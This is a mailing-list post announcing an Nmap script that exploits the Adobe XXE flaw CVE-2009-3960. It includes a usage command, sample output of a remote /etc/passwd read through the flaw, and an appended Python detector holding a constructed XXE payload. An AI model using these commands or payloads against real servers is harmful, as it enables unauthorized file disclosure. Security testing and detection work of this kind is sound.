Nmap Development mailing list archives

[NSE] http-cve-2009-3960 (Adobe XML External Entity Injection)
From: Hani Benhabiles <kroosec () gmail com>
Date: Sat, 31 Dec 2011 15:47:06 +0100

Hi list,

description = [[
Exploits CVE-2009-3960, also known as Adobe XML External Entity Injection.

This vulnerability allows local files to be read remotely and is present in
BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data
Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and
ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0.

For more information see:
* http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
* http://www.osvdb.org/62292
* Metasploit module: auxiliary/scanner/http/adobe_xml_inject
]]

---
-- @args http-cve-2009-3960.root Points to the root path. Defaults to "/"
-- @args http-cve-2009-3960.readfile Target file to be read. Defaults to "/etc/passwd"
--
-- @usage
-- nmap --script=http-cve-2009-3960 --script-args http-cve-2009-3960.root="/root/" <target>
--
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
--| http-cve-2009-3960:
--|     samples/messagebroker/http
--|     <?xml version="1.0" encoding="utf-8"?>
--|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string> [...] root:x:0:0:root:/root:/bin/bash
--|     bin:*:1:1:bin:/bin:/sbin/nologin
--|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
--|     adm:*:3:4:adm:/var/adm:/sbin/nologin
--|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
--|     sync:*:5:0:sync:/sbin:/bin/sync
--|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
--|     halt:*:7:0:halt:/sbin:/sbin/halt
--|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
--|     news:*:9:13:news:/etc/news:
--|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
--|     operator:*:11:0:operator:/root:/sbin/nologin
--|     games:*:12:100:games:/usr/games:/sbin/nologin
--|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
--|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
--|     nobody:*:99:99:Nobody:/:/sbin/nologin
--|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
--|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
--|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
--|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
--|     [...]
--|_

Cheers,
Hani

-- 
M. Hani Benhabiles
OWASP Algeria SC founder and president.
Blog: http://kroosec.blogspot.com
Twitter: kroosec <https://twitter.com/#%21/kroosec>

Attachment: http-cve-2009-3960.nse
Description:

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
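
A defender-side check for the behaviour shown in the sample output above, as an added example that is not part of the original post or the attached script: it flags a DTD sent to an AMFX endpoint and passwd-format lines coming back inside an AMFX reply. Assumptions: the endpoint path contains `/messagebroker/` (as in `samples/messagebroker/http`), the threshold of three leaked lines is arbitrary, and all sample bodies are constructed.

```python
import re

# Assumption: BlazeDS/LiveCycle channel paths contain "/messagebroker/",
# as in the "samples/messagebroker/http" path from the script output.
ENDPOINT = re.compile(r"/messagebroker/", re.I)
# AMFX requests are plain XML; a legitimate client has no reason to send a DTD.
DTD = re.compile(r"<!\s*(?:DOCTYPE|ENTITY)\b", re.I)
# passwd(5) record: name:password:uid:gid:gecos:home:shell
PASSWD = re.compile(
    r"^[A-Za-z_][\w.-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M)
MIN_LEAKED_LINES = 3  # assumption: threshold chosen to limit false positives

def inspect(path, request_body, response_body):
    """Return findings for one HTTP exchange (empty list means clean)."""
    findings = []
    if not ENDPOINT.search(path):
        return findings  # out of scope for this check
    if DTD.search(request_body):
        findings.append("request: DTD/entity declaration sent to AMFX endpoint")
    leaked = PASSWD.findall(response_body)
    if "<amfx" in response_body and len(leaked) >= MIN_LEAKED_LINES:
        findings.append(
            "response: %d passwd-format lines inside AMFX reply" % len(leaked))
    return findings

# Constructed samples (not captured traffic).
SAMPLE_REQ = ('<?xml version="1.0"?><!DOCTYPE t [<!ENTITY x SYSTEM '
              '"file:///constructed/path">]><amfx ver="3"></amfx>')
SAMPLE_RESP = ('<?xml version="1.0" encoding="utf-8"?><amfx ver="3">'
               '<body targetURI="/onResult">root:x:0:0:root:/root:/bin/bash\n'
               'bin:*:1:1:bin:/bin:/sbin/nologin\n'
               'daemon:*:2:2:daemon:/sbin:/sbin/nologin\n'
               'adm:*:3:4:adm:/var/adm:/sbin/nologin\n'
               '</body></amfx>')
CLEAN_REQ = '<amfx ver="3"><body></body></amfx>'
CLEAN_RESP = '<amfx ver="3"><body targetURI="/onResult"></body></amfx>'

if __name__ == "__main__":
    for finding in inspect("/samples/messagebroker/http", SAMPLE_REQ, SAMPLE_RESP):
        print(finding)
```

The first leaked line is missed on purpose: it shares a line with XML markup, so the count comes from the records that follow it.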
